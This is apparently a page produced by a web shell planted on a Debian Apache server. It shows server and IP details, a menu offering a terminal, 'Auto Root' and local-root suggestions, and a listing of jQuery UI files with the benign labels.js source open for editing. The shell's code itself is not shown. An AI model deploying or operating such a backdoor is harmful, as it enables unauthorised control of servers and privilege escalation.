Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
javascript /
jquery-ui /
ui /
Delete
Unzip
Name
Size
Permission
Date
Action
effects
[ DIR ]
drwxr-xr-x
2025-06-07 09:54
i18n
[ DIR ]
drwxr-xr-x
2025-06-07 09:54
vendor
[ DIR ]
drwxr-xr-x
2025-06-07 09:54
widgets
[ DIR ]
drwxr-xr-x
2025-06-07 09:54
core.js
361
B
-rw-r--r--
2022-07-14 19:10
core.min.js
257
B
-rw-r--r--
2022-07-28 06:05
data.js
934
B
-rw-r--r--
2022-07-14 19:10
data.min.js
360
B
-rw-r--r--
2022-07-28 06:05
disable-selection.js
1.05
KB
-rw-r--r--
2022-07-14 19:10
disable-selection.min.js
461
B
-rw-r--r--
2022-07-28 06:05
effect.js
24.04
KB
-rw-r--r--
2022-07-14 19:10
effect.min.js
13.71
KB
-rw-r--r--
2022-07-28 06:05
focusable.js
2.24
KB
-rw-r--r--
2022-07-14 19:10
focusable.min.js
1.07
KB
-rw-r--r--
2022-07-28 06:05
form-reset-mixin.js
1.78
KB
-rw-r--r--
2022-07-14 19:10
form-reset-mixin.min.js
959
B
-rw-r--r--
2022-07-28 06:05
form.js
581
B
-rw-r--r--
2022-07-14 19:10
form.min.js
256
B
-rw-r--r--
2022-07-28 06:05
ie.js
385
B
-rw-r--r--
2022-07-14 19:10
ie.min.js
224
B
-rw-r--r--
2022-07-28 06:05
jquery-patch.js
2.12
KB
-rw-r--r--
2022-07-14 19:10
jquery-patch.min.js
725
B
-rw-r--r--
2022-07-28 06:05
jquery-var-for-color.js
530
B
-rw-r--r--
2022-07-14 19:10
jquery-var-for-color.min.js
141
B
-rw-r--r--
2022-07-28 06:05
keycode.js
820
B
-rw-r--r--
2022-07-14 19:10
keycode.min.js
322
B
-rw-r--r--
2022-07-28 06:05
labels.js
1.73
KB
-rw-r--r--
2022-07-14 19:10
labels.min.js
586
B
-rw-r--r--
2022-07-28 06:05
plugin.js
1020
B
-rw-r--r--
2022-07-14 19:10
plugin.min.js
617
B
-rw-r--r--
2022-07-28 06:05
position.js
14.77
KB
-rw-r--r--
2022-07-14 19:10
position.min.js
9.47
KB
-rw-r--r--
2022-07-28 06:05
safe-active-element.js
1014
B
-rw-r--r--
2022-07-14 19:10
safe-active-element.min.js
406
B
-rw-r--r--
2022-07-28 06:05
safe-blur.js
523
B
-rw-r--r--
2022-07-14 19:10
safe-blur.min.js
270
B
-rw-r--r--
2022-07-28 06:05
scroll-parent.js
1.25
KB
-rw-r--r--
2022-07-14 19:10
scroll-parent.min.js
674
B
-rw-r--r--
2022-07-28 06:05
tabbable.js
883
B
-rw-r--r--
2022-07-14 19:10
tabbable.min.js
367
B
-rw-r--r--
2022-07-28 06:05
unique-id.js
976
B
-rw-r--r--
2022-07-14 19:10
unique-id.min.js
391
B
-rw-r--r--
2022-07-28 06:05
version.js
322
B
-rw-r--r--
2022-07-14 19:10
version.min.js
184
B
-rw-r--r--
2022-07-28 06:05
widget.js
19.81
KB
-rw-r--r--
2022-07-14 19:10
widget.min.js
11.61
KB
-rw-r--r--
2022-07-28 06:05
Save
Rename
/*! * jQuery UI Labels 1.13.2 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */ //>>label: labels //>>group: Core //>>description: Find all the labels associated with a given input //>>docs: http://api.jqueryui.com/labels/ ( function( factory ) { "use strict"; if ( typeof define === "function" && define.amd ) { // AMD. Register as an anonymous module. define( [ "jquery", "./version" ], factory ); } else { // Browser globals factory( jQuery ); } } )( function( $ ) { "use strict"; return $.fn.labels = function() { var ancestor, selector, id, labels, ancestors; if ( !this.length ) { return this.pushStack( [] ); } // Check control.labels first if ( this[ 0 ].labels && this[ 0 ].labels.length ) { return this.pushStack( this[ 0 ].labels ); } // Support: IE <= 11, FF <= 37, Android <= 2.3 only // Above browsers do not support control.labels. Everything below is to support them // as well as document fragments. control.labels does not work on document fragments labels = this.eq( 0 ).parents( "label" ); // Look for the label based on the id id = this.attr( "id" ); if ( id ) { // We don't search against the document in case the element // is disconnected from the DOM ancestor = this.eq( 0 ).parents().last(); // Get a full set of top level ancestors ancestors = ancestor.add( ancestor.length ? ancestor.siblings() : this.siblings() ); // Create a selector for the label based on the id selector = "label[for='" + $.escapeSelector( id ) + "']"; labels = labels.add( ancestors.find( selector ).addBack( selector ) ); } // Return whatever we have found for labels return this.pushStack( labels ); }; } );